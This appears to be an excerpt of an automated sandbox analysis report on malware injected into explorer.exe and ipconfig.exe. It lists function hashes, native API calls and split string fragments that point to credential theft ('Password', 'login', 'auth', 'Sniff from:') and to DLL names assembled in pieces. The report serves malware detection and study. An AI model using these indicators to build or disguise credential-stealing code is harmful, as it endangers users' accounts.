
Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: de71500488ef99315cc7661012d32e75157acfdf5b00138386ade61071553f5c
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: EE918070A187488BDB19EFA8D444BEEBBE1FF98300F40462ED58AD7251EF7099458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AF352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 0E3AF4A0
, xrefs: 0E3AF47C
., xrefs: 0E3AF3B0
n, xrefs: 0E3AF3E7
e, xrefs: 0E3AF48E

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: c6ab3a4d1331c7e53328a9ed7bf80da903cb0b8a5376e1ed108f23435f097cde
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 54715131A18B498FD758EFA8D4846EAB7F1FF98304F00062FD54AC7261EB71D9458B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AAC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 0E3AAC97
ole3, xrefs: 0E3AAC5D
shel, xrefs: 0E3AAC90
2.dl, xrefs: 0E3AAC64
dll, xrefs: 0E3AAC9E

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: eb5b8f5fba5981146c287890af5485dd5f4401dcfa0b50897cabd051a58f6233
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: E1513AB0918B4C8BDB64EFA4C045AEEB7E1FF58301F404A2ED59BE7214EF7095418B89

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AB86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

vers, xrefs: 0E3AB8E4
dll, xrefs: 0E3AB8F4
4, xrefs: 0E3AB9E9
ion., xrefs: 0E3AB8EC
\, xrefs: 0E3AB9E0

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: a829ae0a53a8ef366ecc00936f7396be587141be401974d8a21b6516c8f65b0e
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: E1415430618B8C8FCBB5EF2498557EABBE5FB98301F54462E995EC7240EF30D9458782

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AD4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0E3AD515
dll, xrefs: 0E3AD51C
32.d, xrefs: 0E3AD4DA
user, xrefs: 0E3AD4D3
sspi, xrefs: 0E3AD50E

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 271f1d10862e33f3981dbdc0bedc6d553e9982e8692cae77031031b00cf71e63
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 9B415E30A18E1D8FCB54FF6880957AD7BF1FB58308F84456AA94EDB610DB70D9808B86

Uniqueness

Uniqueness Score: -1.00%

Function 0E3AB432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0E3AB52A
h, xrefs: 0E3AB51F
.dll, xrefs: 0E3AB53F
el32, xrefs: 0E3AB537

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 5944251f464b2e6e51959444b3b925a4103eb449c4d64209a0586d55f014167b
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: AF418F70608B4C8FD7A9DF6884843AAFBE1FB98300F144B6E959EC3655DB70C985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B20B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E3B213D
Snif, xrefs: 0E3B2154
om:, xrefs: 0E3B2146
, xrefs: 0E3B2184

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 5dc6cbc8a79b331d9e7e1efde50db1e39cec27d916daac87594772f5d15f21fe
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 7B31E77151CB485FD71AEB28C4846DABBD4FB84300F504D1EE59BC7692EE30AA49CB43

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B20C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E3B213D
Snif, xrefs: 0E3B2154
om:, xrefs: 0E3B2146
, xrefs: 0E3B2184

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 4ced49ef53236bb84f8a1a5d504372acf4f484405f93730c0c85fa99fa25c2ce
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: DA31F671518B486FD71AEB24C4846DABBD4FB94300F404E1EE59BC7656EE30E905CA43

Uniqueness

Uniqueness Score: -1.00%

Function 0E3ADFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E3ADFFE
chro, xrefs: 0E3AE023
me_c, xrefs: 0E3ADFEE
hild, xrefs: 0E3ADFF6

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: ccc953df9fbad57b061d075b415a0a4f4e25c50d2e579e4edc23d531d6f67048
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: C3314D70118B188FCB84EF698495BAABBE1FBD8300F844A6D954FCB255DF30C945C752

Uniqueness

Uniqueness Score: -1.00%

Function 0E3ADFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E3ADFFE
chro, xrefs: 0E3AE023
me_c, xrefs: 0E3ADFEE
hild, xrefs: 0E3ADFF6

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 9ab48ec00638bb67a4637a3a6f61b7e71e82687b2dcb477670eebe6ca9e45f3b
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: E6315E70118B088FC794EF698494BAABBE1FBD8300F844A6D954ACB255DF30C945C752

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B08C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 0E3B0902
urlmon.dll, xrefs: 0E3B0959
nt: , xrefs: 0E3B091E
User-Agent: , xrefs: 0E3B0935, 0E3B0948

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: eadb4a84bcaf66246a29836ff6f7e3064a6f370d084d9d6b06d9ffd6227007a7
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 5C31D131A14A0C8BCB05EFA8C8847EEBBE1FB98214F40062AD54ED7240DE748A45C789

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B08BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 0E3B0902
urlmon.dll, xrefs: 0E3B0959
nt: , xrefs: 0E3B091E
User-Agent: , xrefs: 0E3B0935, 0E3B0948

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 9bcdd7218d449f3f7bc02d9addbc717593986d88f82a9a30b0c2f839a7141d7d
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: F421D030A10A0C8BCB05EFA8C8847EEBBE1FF98214F40462AD55BD7250DF748A05CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B1E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 0E3B1EF4
l, xrefs: 0E3B1F03
l, xrefs: 0E3B1F26
., xrefs: 0E3B1F1F

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 5d7b001a35dd19c4e820e210e2db33117cd10fe8237e537099688bc6959848bc
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 8C215C70A24A0D9FDB48EFA8D0547EDBAF1FB98314F504A2ED10AD3A10DB7499918B84

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B1E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 0E3B1EF4
l, xrefs: 0E3B1F03
l, xrefs: 0E3B1F26
., xrefs: 0E3B1F1F

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 8881990c55252ce7125ea33199574d8d68b31fd7207a856528505221916aa393
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 01216D70A24A0D9FDB48EFA8D0547EDBBF1FB58314F504A2ED10AD3A00DB7499518B84

Uniqueness

Uniqueness Score: -1.00%

Function 0E3B1FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 0E3B203C
pass, xrefs: 0E3B2022
user, xrefs: 0E3B2015
auth, xrefs: 0E3B202F

Memory Dump Source

Source File: 00000006.00000002.3844142074.000000000E2D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E2D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e2d0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 1ab698bc5ec1e93adee1eb5061dc343835eef4af829958a3758111ca6238bcbb
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 1321CD70624B0D8BCB05DF9998906EEBBE1EFC8344F004A1AE40AEB254D7B0D9158BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ipconfig.exePID: 7884, Parent PID: 3504COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	590
Total number of Limit Nodes:	73

Executed Functions

Function 001EA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,001E4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 001EA3AD

Strings

.z`, xrefs: 001EA39D, 001EA3A8

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e72a3dbb3a0b321610b1153245910af92602264eb0d97e36aa528d1c853e3895
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 48F0BDB2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EA35C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,001E4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 001EA3AD

Strings

.z`, xrefs: 001EA39D, 001EA3A8

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
Instruction ID: 14815ca02a0283d6805c16cfb500992e201a19a57f88e6392d3cd522a49bcfd1
Opcode Fuzzy Hash: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
Instruction Fuzzy Hash: 34F0C4B2214149ABCB08DFA9D884CEB77A9FF8C754B15865DFA1D93206D630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(001E4D72,5EB65239,FFFFFFFF,001E4A31,?,?,001E4D72,?,001E4A31,FFFFFFFF,5EB65239,001E4D72,?,00000000), ref: 001EA455

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: f1dec8f34f912fa7877fa57f3876a16d2a075c3facfa82a95aabbc66086a3941
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: A4F0A4B2200208ABCB14DF99DC81EEB77ADEF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EA40B Relevance: 1.5, APIs: 1, Instructions: 34filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(001E4D72,5EB65239,FFFFFFFF,001E4A31,?,?,001E4D72,?,001E4A31,FFFFFFFF,5EB65239,001E4D72,?,00000000), ref: 001EA455

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
Instruction ID: 11ffb0b00be11898c541d1ba2ae9b5c5ed278d8919aee2287539cc31f801a94d
Opcode Fuzzy Hash: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
Instruction Fuzzy Hash: 9DF01DB2114049AFCB04DF99D880CEBB7ADEF8C214B15864DF95C97201C630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001EA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(001E4D50,?,?,001E4D50,00000000,FFFFFFFF), ref: 001EA4B5

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e46a71c2fb63ad5d1fdb74bedb57f61b4e474f129dca2e0c6a1db3eabb361b01
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 57D01275200214ABD710EB99CC45E9B775CEF44750F154455BA185B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2ADA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a81fdb35940776d27a2db810196acfcc61e031ffd67bac6853a7411bb92678d2
Instruction ID: c1d2da1b5a120fdc5c3c812b6e9b661866899a37cc2843cde30be114a3b8d4a6
Opcode Fuzzy Hash: a81fdb35940776d27a2db810196acfcc61e031ffd67bac6853a7411bb92678d2
Instruction Fuzzy Hash: 7B900225215800430205B5590744607004687D5351355C021F10196B5CD6218D616121

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2B6A

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdb9d83ab7cf241f80391ae4f3d23024ac1c3d3e636bbb823ce9de11a0fe85e9
Instruction ID: 4fdb2d66a7af03e6e240761f442a4422e4e27d5cbdc29478eab736659f6e7d82
Opcode Fuzzy Hash: cdb9d83ab7cf241f80391ae4f3d23024ac1c3d3e636bbb823ce9de11a0fe85e9
Instruction Fuzzy Hash: 6690026120680043420571594454717400A87E0201B55C021E10186F5DC5258D917125

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2EAA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f439e4c0b432a55db8e3d2432d21a32885ceeee8eea8de233b9e134a277f9837
Instruction ID: 41d068873013f47e439226c9312692b5253af4631e5bae211dd6d1604bde49c2
Opcode Fuzzy Hash: f439e4c0b432a55db8e3d2432d21a32885ceeee8eea8de233b9e134a277f9837
Instruction Fuzzy Hash: 1190027120580442D24071594444747000587D0301F55C011A50686B9E86598ED57665

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2FEA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce1b1a408112148ab67c97b154d3a90c5c24ad1b9ea11ef2009f4c4a5ba56093
Instruction ID: e6eced6a6f8160b8977d30cf97d3f1c4e895f3e8c7b42beee890b23884b635b1
Opcode Fuzzy Hash: ce1b1a408112148ab67c97b154d3a90c5c24ad1b9ea11ef2009f4c4a5ba56093
Instruction Fuzzy Hash: C3900221215C0082D30075694C54B07000587D0303F55C115A01586B9CC9158D616521

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2F3A

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d87836284f1b6da58071462a805591f1d05503b0a97b91d1590cb99ad4069c6
Instruction ID: 9ece9e106c4e57378298e5dfd67d1653e7fdd4abc3b3a499b54993a60e17132b
Opcode Fuzzy Hash: 8d87836284f1b6da58071462a805591f1d05503b0a97b91d1590cb99ad4069c6
Instruction Fuzzy Hash: 2190026134580482D20071594454B070005C7E1301F55C015E10686B9D8619CD527126

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2CAA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 751bccbd4a135c8b98762be8802a57a97a8c236a4cd4036e397f6aa0d9e3afc2
Instruction ID: 7aff8c1c77137da337fd2c232f545fe9581589ffdd4710550bc2fa668e19c661
Opcode Fuzzy Hash: 751bccbd4a135c8b98762be8802a57a97a8c236a4cd4036e397f6aa0d9e3afc2
Instruction Fuzzy Hash: B290023120580442D20075995448747000587E0301F55D011A50286BAEC6658D917131

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2C6A

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
